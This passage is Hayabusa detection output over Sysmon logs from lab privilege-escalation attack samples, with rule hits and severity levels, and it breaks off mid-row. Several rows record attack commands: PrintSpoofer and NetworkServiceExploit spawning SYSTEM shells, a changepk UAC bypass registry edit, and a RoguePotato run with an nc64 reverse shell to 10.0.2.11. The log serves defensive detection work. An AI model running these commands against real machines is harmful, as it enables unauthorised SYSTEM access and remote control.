4536 | PGUID: 747F3D96-B769-5EA4-0000-00101D9C0300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x1d39b | PID: 4600 | PGUID: 747F3D96-B76A-5EA4-0000-0010EEB50300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\Temp | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCache | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: 
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetHistory | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCookies | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc | LID: 0x1d39b | PID: 5840 | PGUID: 747F3D96-B76F-5EA4-0000-0010624D0600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6964 | PGUID: 747F3D96-B776-5EA4-0000-0010A74D0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" 
/InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x1d39b | PID: 7000 | PGUID: 747F3D96-B776-5EA4-0000-001006590B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 6656 | PGUID: 747F3D96-B79B-5EA4-0000-00105BD50F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 318 0000021FF2606500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6648 | PGUID: 747F3D96-B79B-5EA4-0000-001075DA0F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 748 | PGUID: 747F3D96-B79B-5EA4-0000-001001FC0F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Discovery - domain time | Cmd: 
""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 | Process: C:\BGinfo\BGINFO.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 7056 | PGUID: 747F3D96-B7A0-5EA4-0000-001026D11000 | Hash: SHA1=1CEE3FA8419BDF4CBC266461277E3FDD9B93DE25,MD5=3652BA8B882BF6C69AF70CE73CF0D616,SHA256=0362CD6E7B318AB9A4C74DAF229F11BB795A2CE553EA024CB49143456C27C41D,IMPHASH=6EC19FF15BC88DDEDB96115003A96430",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\SecurityHealthService.exe | Process: C:\Windows\System32\SecurityHealthService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 7088 | PGUID: 747F3D96-B7A0-5EA4-0000-001027D81000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x1d39b | PID: 3376 | PGUID: 747F3D96-B7A0-5EA4-0000-00108D131100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 864 | PGUID: 
747F3D96-B7A2-5EA4-0000-0010982F1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 3256 | PGUID: 747F3D96-B7A5-5EA4-0000-0010CAB51300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 258 0000021FF266EC20 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7036 | PGUID: 747F3D96-B7A5-5EA4-0000-0010EAB91300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 4480 | PGUID: 747F3D96-B7AA-5EA4-0000-001066001700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2792 | PGUID: 747F3D96-B7D4-5EA4-0000-0010E09B1700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 6548 | PGUID: 747F3D96-B7DE-5EA4-0000-0010FA4E1800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 992 | PGUID: 747F3D96-B7DF-5EA4-0000-001052671800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1396 | PGUID: 747F3D96-B7DF-5EA4-0000-001080711800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-05-03 03:01:52.553 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 7212 | PGUID: 747F3D96-B49D-5EAD-0000-001029FEBE00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PrintSpoofer.exe -i -c powershell.exe | Process: 
C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x812b1 | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: System | PID: 4 | PGUID: 747F3D96-6AB8-5EAD-0000-0010EB030000,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,Evas | 
PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: powershell.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PrintSpoofer.exe -i -c powershell.exe | LID: 0x3e7 | PID: 1428 | PGUID: 747F3D96-B592-5EAD-0000-0010D4CDC200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe | LID: 0x3e7 | PID: 6004 | PGUID: 747F3D96-B595-5EAD-0000-00106BFDC200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 
+09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-07 22:13:01.683 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - T1088 - UACBypass - changepk UACME61 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Launcher.SystemSettings\shell\open\command\(Default): c:\Windows\System32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 7084 | PGUID: 747F3D96-095D-5EB4-0000-001082FF1700,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx +2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\ChangePk.exe"" | LID: 0x2ecba | PID: 5216 | PGUID: 747F3D96-095E-5EB4-0000-0010D46F1800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx +2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | Process: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.647 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\frAQBc8Wsa1 | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 
747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.662 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\frAQBc8Wsa1 | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | LID: 0x3e7 | PID: 372 | PGUID: 747F3D96-4640-5EB7-0000-0010EF364B01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 7672 | PGUID: 747F3D96-4647-5EB7-0000-0010B3454B01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts 
Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 180 | PGUID: 747F3D96-46A4-5EB7-0000-00109FE74C01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:11:20.824 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.101:49683 (MSEDGEWIN10) | Dst: 192.168.56.1:139 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | Process: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent 